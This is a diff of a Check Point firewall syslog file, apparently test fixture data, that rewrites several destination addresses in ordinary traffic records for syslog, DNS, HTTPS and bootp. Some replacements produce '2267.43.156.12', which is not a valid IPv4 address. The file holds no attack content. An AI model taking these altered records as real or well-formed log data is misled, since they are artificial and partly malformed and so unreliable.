 <134>1 2020-03-29T20:19:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102eb,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43950"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10452"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T20:19:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:20:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
-<134>1 2020-03-29T20:20:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102f5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:20:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:20:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102f5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:20:57Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81032b,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T20:20:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81032b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:20:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81032b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.196"]
@@ -5050,7 +5050,7 @@
 <134>1 2020-03-29T20:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103a8,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51561"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103a9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:23:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103af,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41728"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:23:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103b4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60914"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T20:23:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103b4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60914"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:23:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103bc,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51562"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:23:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103bc,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51563"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:23:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103bf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36036"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10456"; xlatesrc:"0.0.0.0"]
@@ -5062,7 +5062,7 @@
 <134>1 2020-03-29T20:23:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103de,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"9999"; service:"9999"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:24:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103e0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51564"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:24:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103e0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51565"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T20:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103e7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103e7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:24:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103e8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:24:34Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810403,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T20:24:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810403,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -5085,8 +5085,8 @@
 <134>1 2020-03-29T20:26:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81047f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51574"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:26:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810482,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51575"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:26:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810482,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51576"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T20:26:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810484,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
-<134>1 2020-03-29T20:26:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810484,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:26:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810484,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
